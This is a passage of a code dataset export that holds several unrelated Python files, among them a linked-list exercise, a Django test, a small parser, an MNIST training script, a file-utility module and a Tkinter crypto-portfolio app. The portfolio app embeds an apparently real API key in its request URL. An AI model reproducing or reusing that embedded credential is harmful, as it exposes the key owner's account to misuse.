\"\"\n","sub_path":"python/erpnext/2015/4/pos_setting.py","file_name":"pos_setting.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"272562311","text":"'''\nProblem Statement: implement an algorithm to find kth element to last\n\nexplantation: 3rd element to last means: last lement: 1st --> last second: 2nd --> element before --> 3rd (return this one)\nexample: Linked list: 1 --> 2 --> 3 --> 4 --> 5 --> 6 --> 7 --> 8 --> 9 --> 10 --> 11 --> 12\nK = 4 {element retruned here is 8}\n\n\nSolution:\nMethod 1: using 2 pointer method (Pointers p and q)\nsteps:\n1) intialize pointer q at kth node\n2) initialize pointer p at head\n3) till q pointer reaches last node: traverse both p and q pointers\n4) now q pointer is at last node while p is at kth element\n\n\nMethod 2:\nwe can keep a count of nodes when populating linked list, and then just traverse to kth node\n\n'''\n\n\nclass Node:\n def __init__(self,data):\n self.data = data #intialize data\n self.next = None #default next pointer is set to none\n\n\nclass SLL:\n\n #initialize head with None\n def __init__(self):\n self.head = None\n self.count = 0\n\n def print_list(self):\n temp = self.head\n\n while(temp != None):\n print(temp.data, end='--->')\n temp = temp.next\n\n def kth_to_last(self,k):\n '''\n\n :param k: position k\n :return: kth node data\n '''\n count = 0\n end1 = self.head \n start = self.head\n \n #intialize pointer end1 to kth node\n while(count < k):\n count += 1\n #print(count, end1.data)\n\n if end1 != None:\n end1 = end1.next\n\n else:\n print('Linked list has less than',k,' elements')\n return\n #print(count)\n\n #traverse: end pointer to last node, start pointer to kth node\n while(end1 != None):\n end1 = end1.next\n\n start = start.next\n\n return(start.data)\n\n\n\n\n\n def insert_first(self,data):\n self.count += 1\n node = Node(data)\n\n\n if self.head == None:\n self.head = node\n return\n\n node.next = self.head\n self.head = node\n\n\n def insert_end(self,data):\n self.count += 1\n\n node = Node(data)\n\n if self.head == None:\n self.head = node\n return\n\n else:\n temp = self.head\n while (temp.next != None):\n temp = temp.next\n temp.next = node\n\n\n\n\nif __name__=='__main__':\n obj = SLL()\n \n #populate linked list\n obj.insert_first(1)\n obj.insert_end(2)\n obj.insert_end(3)\n obj.insert_end(4)\n obj.insert_end(5)\n obj.insert_end(6)\n obj.insert_end(7)\n obj.insert_end(8)\n obj.insert_end(9)\n obj.insert_end(10)\n obj.insert_end(11)\n obj.insert_end(12)\n\n\n print('linked list')\n obj.print_list()\n\n \n element = obj.kth_to_last(12)\n print(element)\n\n\n","sub_path":"Linked-List/CTCI-Chapter02-Q2-return_kth_to_last.py","file_name":"CTCI-Chapter02-Q2-return_kth_to_last.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"597862874","text":"from django.test import TestCase\n\nfrom .model_instances import create_comment\nfrom ..forms import CommentForm\n\n\nclass TestCommentForm(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.obj = create_comment()\n cls.form = CommentForm\n\n def test_form_with_no_data(self):\n self.assertFalse(self.form(data={}).is_valid(),\n 'Should be invalid if no data is given')\n\n def test_valid_form(self):\n data = {'body': 'Lorem ipsum...'}\n self.assertTrue(CommentForm(data=data).is_valid(),\n 'Should be valid with all data')\n","sub_path":"group_site/news/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"41158929","text":"# -*- coding: utf-8 -*-\n# @Author: SmokedInk\n# @Title: settings\n# @Time: 2019-12-10 13:37:07\n# @Desc: 配置文件\n\nimport os\n\n\n# 项目根目录\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# 服务器调试模式, 值为False时不自动重启服务器\nDEBUG = False\n\n# 变更自动重启\nAUTORELOAD = False\n\n# cookie secret key\nCOOKIE_SECRET = '{cookie_secret}'\n\n# 是否开启csrf攻击防范\nXSRF_COOKIES = False\n\n# 允许访问的HOST配置\nALLOWED_HOSTS = []\n\n# 模块配置\nMODULES = [\n # \"swagger\",\n]\n\n# 命令配置\nCOMMANDS = []\n\n# 数据库配置\nDATABASES = {\n 'mongodb': {\n \"host\": 'localhost',\n \"port\": 27017\n }\n}\n\n# 缓存\nCACHES = {}\n\n# 静态文件目录\nSTATIC = \"\"\n\n# 模板文件目录\nTEMPLATE = \"\"\n\n# 算法模型目录\nDATA = \"\"\n\nPAGE_SIZE = 10\n\nPAGE_SHOW = 10\n","sub_path":"config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"22219859","text":"from tokens import *\nfrom ast import *\n\n#morao sam da reimenujem file jer python ima built-in module parser, posle sat vremena debug-a -.-\n\nclass Parser(object):\n\n \"\"\"\n Gramatika:\n \n program -> compound_statement TACKA\n \n compound_statement -> BEGIN statement_list END\n \n statement_list -> statement | statement SEMI statement_list\n \n statement -> compound_statement | assign_statement | empty\n \n empty ->\n \n assign_statement -> promenljiva ASSIGN izraz\n \n izraz -> term ((PLUS | MINUS) term)*\n \n term -> faktor ((PUTA | PODELJENO) faktor)*\n \n faktor -> (PLUS | MINUS) faktor | INTEGER | LZ izraz DZ | promenljiva\n \n promenljiva -> ID\n \n \"\"\"\n\n def __init__(self,lexer):\n self.lexer = lexer\n self.trenutni_token = self.lexer.next_token() #inicijalizacija prvog tokena\n\n def greska(self):\n raise Exception('Greska pri parsiranju na {}.'.format(self.trenutni_token))\n\n\n def move(self,token):\n \"\"\"\n Pomera se na sledeci token.\n :param token: tip trenutnog tokena\n \"\"\"\n if self.trenutni_token.tip == token:\n self.trenutni_token = self.lexer.next_token()\n else:\n self.greska()\n\n def program(self):\n \"\"\"\n program pravilo gramatike.\n Glavna funkcija koja vraca parsno stablo.\n :return: AST root\n \"\"\"\n\n cvor = self.compound_statement()\n self.move(TACKA)\n return cvor\n\n def compound_statement(self):\n \"\"\"\n compound_statement pravilo gramatike impl.\n Vraca Compound cvor koji sadrzi listu statement-a.\n :return: Compound node\n \"\"\"\n\n self.move(BEGIN)\n stmt_list = self.statement_list()\n self.move(END)\n\n koren = Compound()\n\n for stmt in stmt_list:\n koren.deca.append(stmt)\n\n return koren\n\n def statement_list(self):\n \"\"\"\n statement_list pravilo gramatike impl.\n Vraca listu statement-a u okviru jednog begin-end bloka.\n :return: statement list\n \"\"\"\n\n lista = [self.statement()]\n\n while self.trenutni_token.tip == SEMI:\n self.move(SEMI)\n lista.append(self.statement())\n\n return lista\n\n def statement(self):\n \"\"\"\n statement pravilo gramatike impl.\n Vraca cvor(compound, assign ili empty)\n \"\"\"\n\n if self.trenutni_token.tip == BEGIN:\n cvor = self.compound_statement()\n elif self.trenutni_token.tip == ID:\n cvor = self.assign_statement()\n else:\n cvor = self.empty()\n\n return cvor\n\n def assign_statement(self):\n \"\"\"\n assign_statement pravilo gramatike impl.\n Vraca cvor tipa Assign(ex. a := 5)\n :return: Assign Node\n \"\"\"\n\n var = self.promenljiva()\n token = self.trenutni_token\n self.move(ASSIGN)\n izraz = self.izraz()\n\n return Assign(var,token,izraz)\n\n def promenljiva(self):\n \"\"\"\n promenljiva pravilo gramatike impl.\n Vraca cvor tipa Var\n :return: Var Node\n \"\"\"\n\n cvor = Var(self.trenutni_token)\n self.move(ID)\n return cvor\n\n def empty(self):\n \"\"\"\n empty pravilo gramatike impl.\n Vraca NoOp cvor(ex 'BEGIN END.' je validan program).\n :return: NoOp Node\n \"\"\"\n\n return NoOp()\n\n\n def faktor(self):\n \"\"\"\n Implementacija \"faktor\" pravila gramatike.\n :return: cvor tipa UnarnaOperacija, \n cvor tipa Broj ili koren podstabla koje predstavlja \"izraz\"\n \"\"\"\n token = self.trenutni_token\n if token.tip == PLUS:\n self.move(PLUS)\n return UnarnaOperacija(token,self.faktor())\n elif token.tip == MINUS:\n self.move(MINUS)\n return UnarnaOperacija(token,self.faktor())\n elif token.tip == INTEGER:\n self.move(INTEGER)\n return Broj(token)\n elif token.tip == LZ:\n self.move(LZ)\n cvor = self.izraz()\n self.move(DZ)\n return cvor\n elif token.tip == ID:\n return self.promenljiva()\n\n def term(self):\n \"\"\"\n Implementacija \"term\" pravila gramatike.\n :return: koren podstabla koje predstavlja \"term\"\n \"\"\"\n\n cvor = self.faktor()\n\n while self.trenutni_token.tip == PUTA or self.trenutni_token.tip == PODELJENO:\n token = self.trenutni_token\n if token.tip == PUTA:\n self.move(PUTA)\n else:\n self.move(PODELJENO)\n\n cvor = BinarnaOperacija(cvor,token,self.faktor())\n\n return cvor\n\n def izraz(self):\n \"\"\"\n Implementacija \"izraz\" pravila gramatike.\n :return: koren podstabla koje predstavlja \"izraz\"\n \"\"\"\n\n cvor = self.term()\n\n while self.trenutni_token.tip == PLUS or self.trenutni_token.tip == MINUS:\n token = self.trenutni_token\n if token.tip == PLUS:\n self.move(PLUS)\n else:\n self.move(MINUS)\n\n cvor = BinarnaOperacija(cvor,token,self.term())\n\n return cvor\n\n\n def parse(self):\n return self.program()","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"638891308","text":"import hashlib\nimport datetime\nfrom pprint import pprint as pp\nimport os\nimport requests\nfrom dotenv import load_dotenv\nload_dotenv()\nimport pandas as pd\n\ndef clean_header(x):\n x = x.str.strip().str.lower().str.replace(' ', '_').str.replace('(', '').str.replace(')', '').str.replace('?','')\n return x\ndef clean_nan(x):\n x = x.fillna('Unknown',inplace = True)\n return x\ndef fill_value(x,value):\n x = x.fillna(f'{value}', inplace=True)\n return x\n\ndef hash_params(alias):\n \"\"\" Marvel API requires server side API calls to include\n md5 hash of timestamp + public key + private key \"\"\"\n timestamp = datetime.datetime.now().strftime('%Y-%m-%d%H:%M:%S')\n pub_key = os.getenv('MARVEL_KEY')\n priv_key = os.getenv('MARVELP_KEY')\n \n hash_md5 = hashlib.md5()\n hash_md5.update(f'{timestamp}{priv_key}{pub_key}'.encode('utf-8'))\n hashed_params = hash_md5.hexdigest()\n try:\n\n params = {'ts': timestamp, 'apikey': pub_key, 'hash': hashed_params,'name':alias}\n res = requests.get('https://gateway.marvel.com/v1/public/characters',params=params)\n results = res.json()\n data = results['data']['results']\n personaje = pd.DataFrame(data)\n comics = dict(personaje['comics'])\n comics2 = comics[0]['items']\n comics3 = []\n for x in comics2:\n comics3.append(x['name'])\n return print('Los 20 primeros comics por orden alfabetico:',comics3)\n except:\n print('No superhero match')\n \ndef statistical_info(x):\n data = pd.read_csv('output/marvel_characters.csv')\n m = data[x].mean()\n return print('The mean is:', m)","sub_path":"src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"129800927","text":"# https://arxiv.org/abs/1711.06104\n# models/mnist\n\nfrom pathlib import Path\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom mnistModels import MNISTmodel\n\ndef build_dataset(root, batch_size, download=False):\n train_dataset = datasets.MNIST(\n root=root, \n train=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,)) # normalize to (-1, 1)\n ]),\n download=download)\n test_dataset = datasets.MNIST(\n root=root, \n train=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))\n ]),\n download=download)\n train_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=batch_size, \n shuffle=True)\n test_loader = torch.utils.data.DataLoader(\n test_dataset,\n batch_size=batch_size, \n shuffle=True)\n return train_dataset, test_dataset, train_loader, test_loader\n\ndef train(model, train_loader, optimizer, loss_function, logterm, device):\n train_loss = 0\n \n model.train()\n for i, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = loss_function(output, target)\n \n loss.backward()\n optimizer.step()\n \n train_loss += loss.item()\n # record\n if logterm >= 1:\n if i % logterm == 0: \n print(f\"[Log] Progress: {100*i/len(train_loader):.2f}% Batch Average loss: {loss:.4f}\")\n \n return train_loss\n\ndef test(model, test_loader, device, save_corrects=False):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += torch.nn.functional.cross_entropy(output, target, reduction=\"sum\").item()\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n \n test_loss /= len(test_loader.dataset)\n test_acc = 100*(correct / len(test_loader.dataset))\n\n return test_loss, test_acc\n\ndef main_train(model, train_loader, test_loader, n_step, logterm, sv_path, device):\n loss_function = nn.CrossEntropyLoss()\n optimizer = optim.Adam(model.parameters())\n best_acc = 0.0\n for step in range(n_step):\n train_loss = train(model, train_loader, optimizer, loss_function, logterm, device)\n test_loss, test_acc = test(model, test_loader, device)\n print(f\"[Step] {step+1}/{n_step}\")\n print(f\"[Train] Average loss: {train_loss:.4f}\")\n print(f\"[Test] Average loss: {test_loss:.4f}, Accuracy: {test_acc:.2f}%\")\n if test_acc >= best_acc:\n best_acc = test_acc\n torch.save(model.state_dict(), sv_path)\n print(\"[Alert] best model saved\")\n print(\"----\"*10)\n return best_acc\n \ndef main(model_types, activation_types, **kwargs):\n root = kwargs[\"root\"]\n project_path = kwargs[\"project_path\"]\n logterm = kwargs[\"logterm\"]\n record_name = kwargs[\"record_name\"]\n sv_folder = kwargs[\"sv_folder\"]\n n_step = kwargs[\"n_step\"]\n batch_size = kwargs[\"batch_size\"]\n download = kwargs[\"download\"]\n device = kwargs[\"device\"]\n seed = kwargs[\"seed\"]\n \n sv_main_path = project_path/sv_folder\n if not sv_main_path.exists():\n sv_main_path.mkdir()\n record_path = project_path/\"trainlog\"/f\"{record_name}-record.txt\"\n if not record_path.exists():\n record_path.touch()\n with record_path.open(mode=\"w\", encoding=\"utf-8\") as f:\n f.write(\"| model_type | activation_type | best_acc |\\n\")\n f.write(\"|--|--|--|\\n\")\n # build datasets\n *_, train_loader, test_loader = build_dataset(root, batch_size, download)\n # start\n for model_type in model_types:\n for activation_type in activation_types:\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n print(f\"[Training {model_type}-{activation_type}] manual_seed={seed}\\n\")\n sv_path = sv_main_path/f\"{model_type}-{activation_type}.pt\"\n # create model\n model = MNISTmodel(model_type, activation_type).to(device)\n # start to train model\n best_acc = main_train(model, train_loader, test_loader, n_step, logterm, str(sv_path), device)\n # record best model accruacy automatically\n with record_path.open(mode=\"a\", encoding=\"utf-8\") as f:\n f.write(f\"|{model_type}|{activation_type}|{best_acc:.2f}%|\\n\")\n \nif __name__ == \"__main__\":\n \n args = dict(\n root = str(Path().home()/\"code\"/\"data\"),\n project_path = Path().home()/\"code\"/\"XAI\",\n logterm = False, \n record_name = \"no1\",\n sv_folder = \"trained/mnist\", \n n_step = 20,\n batch_size = 128,\n download = False,\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\",\n seed = 73\n )\n \n activation_types = [\"relu\", \"tanh\", \"sigmoid\", \"softplus\"]\n model_types = [\"dnn\", \"cnn\"]\n main(model_types, activation_types, **args)","sub_path":"models/mnist/mnistTrain.py","file_name":"mnistTrain.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"425576768","text":"N = int(input())\nA = list((i, j) for i, j in enumerate(map(int, input().split())))\ndictL = {}\ndictR = {}\n\nans = 0\nfor i in range(N):\n l, r = A[i][1] + A[i][0], A[i][0] - A[i][1]\n if l not in dictL:\n dictL[l] = 1\n else:\n dictL[l] += 1\n if r not in dictR:\n dictR[r] = 1\n else:\n dictR[r] += 1\n\nfor i in dictL.keys():\n if i in dictR.keys():\n ans += dictL[i] * dictR[i]\n \nprint(ans) \n","sub_path":"contest/abc166/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"649654141","text":"from tkinter import *\nimport requests\nimport json\n\npycrypto=Tk()\npycrypto.title(\"My crypto Portfolio\")\npycrypto.iconbitmap('favicon.ico')\n\ndef font_color(amount):\n if amount>0:\n return \"green\"\n else:\n return \"red\"\n\ndef my_portfolio():\n\n api_request=requests.get(\"https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest?start=1&limit=1000&convert=USD&CMC_PRO_API_KEY=4d284c7c-947f-4a9f-8870-dfc343a74d7d\")\n \n api=json.loads(api_request.content)\n \n # print(api)\n # usage of for loop\n #coins=[\"STX\",\"BAND\",\"ZEN\",\"CHSB\"]\n \n \n coins=[{\n \"symbol\":\"BTC\",\n \"amount_owned\":380,\n \"price_per_coin\":45\n },\n {\n \"symbol\":\"BAND\",\n \"amount_owned\":8,\n \"price_per_coin\":32\n },\n {\n \"symbol\":\"ZEN\",\n \"amount_owned\":20000,\n \"price_per_coin\":45\n },\n {\n \"symbol\":\"CHSB\",\n \"amount_owned\":35,\n \"price_per_coin\":6\n },\n {\n \"symbol\":\"STX\",\n \"amount_owned\":70,\n \"price_per_coin\":5}\n ]\n \n total_pl=0\n coin_row=1\n total_current_value=0\n for i in range(0, 100):\n for coin in coins:\n if api[\"data\"][i][\"symbol\"]==coin[\"symbol\"]:\n total_paid=coin[\"amount_owned\"]*coin[\"price_per_coin\"]\n current_value=coin[\"amount_owned\"]*api[\"data\"][i][\"quote\"][\"USD\"][\"price\"]\n pl_percoin=api[\"data\"][i][\"quote\"][\"USD\"][\"price\"]-coin[\"price_per_coin\"]\n total_pl_coin=pl_percoin*coin[\"amount_owned\"]\n total_pl=total_pl+total_pl_coin\n total_current_value=total_current_value+current_value\n \n # print(api[\"data\"][i][\"name\"]+\"-\"+)\n # print(\"Price-${0:.2f}\".format(api[\"data\"][i][\"quote\"][\"USD\"][\"price\"]))\n # print(\"Number of coin:\",coin[\"amount_owned\"])\n # print(\"Toatl amount paid-\",\"{0:.2f}\".format(total_paid))\n # print(\"Current value:\",\"${0:.2f}\".format(current_value))\n # print(\"profit and Loss Per Coin:\",\"${0:.2f}\".format(pl_percoin))\n # print(\"Toatal prfit and Loss with coin:\",\"${0:.2f}\".format(total_pl_coin))\n # print(\"--------------------------------\")\n \n \n name=Label(pycrypto,text=api[\"data\"][i][\"symbol\"], bg=\"#F3F4F6\" ,fg=\"black\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n name.grid(row= coin_row,column=0 ,sticky=N+S+E+W)\n \n price=Label(pycrypto,text=\"${0:.2f}\".format(api[\"data\"][i][\"quote\"][\"USD\"][\"price\"]), bg=\"#F3F4F6\" ,fg=\"black\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n price.grid(row= coin_row,column=1,sticky=N+S+E+W)\n \n no_coins=Label(pycrypto,text=coin[\"amount_owned\"], bg=\"#F3F4F6\" ,fg=\"black\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n no_coins.grid(row= coin_row,column=2 ,sticky=N+S+E+W)\n \n amount_paid=Label(pycrypto,text=\"${0:.2f}\".format(total_paid), bg=\"#F3F4F6\" ,fg=\"black\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n amount_paid.grid(row= coin_row,column=3 ,sticky=N+S+E+W)\n \n Current_val=Label(pycrypto,text=\"${0:.2f}\".format(current_value), bg=\"#F3F4F6\" ,fg=font_color(float(\"{0:.2f}\".format(current_value))) ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n Current_val.grid(row= coin_row,column=4 ,sticky=N+S+E+W)\n \n Pl_coin=Label(pycrypto,text=\"${0:.2f}\".format(pl_percoin), bg=\"#F3F4F6\" ,fg=font_color(float(\"{0:.2f}\".format(pl_percoin))) ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n Pl_coin.grid(row= coin_row,column=5 ,sticky=N+S+E+W)\n \n totalpl=Label(pycrypto,text=\"${0:.2f}\".format(total_pl_coin), bg=\"#F3F4F6\" ,fg=font_color(float(\"{0:.2f}\".format(total_pl_coin))) ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n totalpl.grid(row= coin_row,column=6 ,sticky=N+S+E+W)\n \n \n \n coin_row= coin_row+1\n \n \n \n #place outsite the increament value\n \n \n \n \n \n \n # print(\"total profit and loss for portfolia:\",total_pl)\n total_pl=Label(pycrypto,text=\"${0:.2f}\".format(total_pl), bg=\"#F3F4F6\" ,fg=font_color(float(\"{0:.2f}\".format(total_pl))) ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n total_pl.grid(row= coin_row,column=6 ,sticky=N+S+E+W)\n total_plcv=Label(pycrypto,text=\"${0:.2f}\".format(total_current_value), bg=\"#F3F4F6\" ,fg=\"black\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n total_plcv.grid(row= coin_row,column=4 ,sticky=N+S+E+W)\n \n api=\"\"\n \n update=Button(pycrypto,text=\"Update\", bg=\"#142E54\" ,fg=\"white\" ,command=my_portfolio, font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n update.grid(row=coin_row+1,column=6 ,sticky=N+S+E+W)\n \n \n \n \n \n \n \nname=Label(pycrypto,text=\"Coin name\", bg=\"#142E54\" ,fg=\"white\",font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\nname.grid(row=0,column=0 ,sticky=N+S+E+W)\n\nprice=Label(pycrypto,text=\"Price\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\nprice.grid(row=0,column=1 ,sticky=N+S+E+W)\n\nno_coins=Label(pycrypto,text=\"Coin Owned\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\nno_coins.grid(row=0,column=2 ,sticky=N+S+E+W)\n\namount_paid=Label(pycrypto,text=\"Total Amount Paid\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\namount_paid.grid(row=0,column=3 ,sticky=N+S+E+W)\n\nCurrent_val=Label(pycrypto,text=\"Current Value\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\nCurrent_val.grid(row=0,column=4 ,sticky=N+S+E+W)\n\nPl_coin=Label(pycrypto,text=\"P/l Per Coin\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\nPl_coin.grid(row=0,column=5 ,sticky=N+S+E+W)\n\ntotalpl=Label(pycrypto,text=\"Total p/l with coin\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\ntotalpl.grid(row=0,column=6 ,sticky=N+S+E+W)\n\n\nmy_portfolio()\npycrypto.mainloop()\nprint(\"Programm completed\")\n\n \n \n \n","sub_path":"main(bitcoin).py","file_name":"main(bitcoin).py","file_ext":"py","file_size_in_byte":6882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"570424267","text":"import os\nimport time\nimport json\nimport shutil\nimport psutil\nimport platform\n\nfrom PyQt5.QtCore import QFileInfo\nfrom PyQt5.QtWidgets import QFileIconProvider\n\n\nclass Dict(dict):\n def __init__(self, *args, **kwargs):\n super(Dict, self).__init__(*args, **kwargs)\n\n def __getattr__(self, item):\n return self.get(item)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n\nclass ICO:\n FILE_TYPE_ICO = dict()\n FILE_TYPE_ICO[\"File Folder\"] = \"static/ico/Folder\"\n FILE_TYPE_ICO[\"Folder\"] = \"static/ico/Folder\"\n FILE_TYPE_ICO[\"Alias\"] = \"static/ico/Folder-\"\n FILE_TYPE_ICO[\"jpg File\"] = \"static/ico/jpg.png\"\n FILE_TYPE_ICO[\"png File\"] = \"static/ico/png.png\"\n FILE_TYPE_ICO[\"sys File\"] = \"static/ico/img.png\"\n FILE_TYPE_ICO[\"text File\"] = \"static/ico/txt.txt\"\n FILE_TYPE_ICO[\"File\"] = \"static/ico/txt.txt\"\n FILE_TYPE_ICO[\"zip File\"] = \"static/ico/zip.zip\"\n FILE_TYPE_ICO[\"7z File\"] = \"static/ico/7z.7z\"\n FILE_TYPE_ICO[\"rar File\"] = \"static/ico/rar.rar\"\n FILE_TYPE_ICO[\"gz File\"] = \"static/ico/gz.gz\"\n\n\ndef os_exists(abs_path):\n return os.path.exists(abs_path)\n\n\ndef file_size(abs_path):\n bytes_size = os.path.getsize(abs_path)\n k_size = bytes_size / 1024\n if k_size >= 1024:\n k_size /= 1024\n unit = \" MB\"\n if k_size >= 1024:\n k_size /= 1024\n unit = \"GB\"\n else:\n unit = \" KB\"\n return round(k_size, 2), unit, bytes_size\n\n\ndef bytes_to_speed(bytes_num):\n k_size = bytes_num / 1024\n if k_size >= 1024:\n k_size /= 1024\n unit = \" MB\"\n if k_size >= 1024:\n k_size /= 1024\n unit = \"GB\"\n else:\n unit = \" KB\"\n return str(round(k_size, 2)) + unit\n\n\ndef second_to_time(second):\n m, s = divmod(second, 60)\n h, m = divmod(m, 60)\n return \"%02d:%02d:%02d\" % (h, m, s)\n\n\ndef get_disk():\n sys_name = platform.system()\n disk = []\n if sys_name == \"Windows\":\n for i in psutil.disk_partitions():\n disk.append(i.device.replace(\"\\\\\", \"/\"))\n else:\n disk.append(\"/Users/lishaoxu/Desktop/\")\n return disk\n\n\ndef listdir(abs_path, include_conceal=True):\n provider = QFileIconProvider()\n try:\n list_dir = os.listdir(abs_path)\n except Exception as e:\n return []\n list_dir.sort()\n file_list = list()\n for file in list_dir:\n item_file = Dict()\n if file.startswith(\".\") and not include_conceal:\n continue\n abs_file_path = os.path.join(abs_path, file)\n item_file.name = file\n item_file.type = provider.type(QFileInfo(abs_file_path))\n try:\n mtime = os.path.getmtime(abs_file_path)\n item_file.last_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(mtime)))\n except Exception:\n item_file.last_time = \"\"\n try:\n if item_file.type in [\"File Folder\", \"Folder\"]:\n item_file.size = \"\"\n item_file.raw_size = 0\n else:\n size, unit, bytes_size = file_size(abs_file_path)\n item_file.size = str(size) + \" \" + unit\n except Exception:\n item_file.raw_size = 0\n item_file.size = \"\"\n file_list.append(item_file)\n Sort_Dict = {1: \"type\", 2: \"name\", 3: \"last_time\", 4: \"raw_size\"}\n file_list = sorted(file_list, key=lambda x: x[Sort_Dict[1]], reverse=False)\n return file_list\n\n\ndef mkdir(dir_path):\n if not dir_path:\n return False, \"不能为空\"\n if os.path.exists(dir_path):\n return False, f\"{dir_path} 已存在!\"\n try:\n os.mkdir(dir_path)\n return True, \"\"\n except Exception as e:\n return False, f\"异常 {str(e)}\"\n\n\ndef rename(old, new):\n if not old or not new:\n return False, \"不能为空\"\n if os.path.exists(new):\n return False, f\"{new} 已存在!\"\n else:\n try:\n os.renames(old, new)\n return True, \"\"\n except Exception as e:\n return False, f\"异常 {str(e)}\"\n\n\ndef remove(abs_path):\n # 删除目录\n if os.path.isdir(abs_path):\n try:\n shutil.rmtree(path=abs_path)\n return True, \"\"\n except Exception as e:\n return False, f\"删除失败 {str(e)}\"\n # 删除文件\n else:\n try:\n os.remove(abs_path)\n return True, \"\"\n except Exception as e:\n return False, f\"删除失败{str(e)}\"\n\ndef padding_data(data, need_len):\n data += b\"*\" * need_len\n return data\n\ndef jsondumps(data):\n return json.dumps(data).encode()\n\ndef decode_dict(bytes_data):\n try:\n return json.loads(bytes_data.decode())\n except Exception as e:\n print(\"decode_dict error\", e, bytes_data)\n\n# 编码数据\ndef encode_dict(dict_data):\n return json.dumps(dict_data).encode()\n\ndef list_dir_all(path, name):\n create_root = False\n abs_path = os.path.join(path, name)\n if os.path.isdir(abs_path): # 发送的是目录\n for home, dirs, files in os.walk(abs_path):\n if not create_root:\n create_root = True\n yield 0, name\n new_home = home.replace(path, '')\n # 获得所有文件夹\n for dirname in dirs:\n yield 0, os.path.join(new_home, dirname)\n\n # 获得所有文件\n for filename in files:\n yield 1, os.path.join(new_home, filename)\n else:\n yield 1, name\n# for i in list_dir_all(\"/Users/lishaoxu/Desktop/\", \"main\"):\n# print(i)\n# print(mkdir(\"/Users/lishaoxu/Desktop/1\"))\n# print(rename(\"/Users/lishaoxu/Desktop/1\", \"/Users/lishaoxu/Desktop/3\"))\n# print(remove(\"/Users/lishaoxu/Desktop/123\"))\n# print(listdir(\"/Users/lishaoxu/Desktop/1\"))\n# print(get_disk())\n# 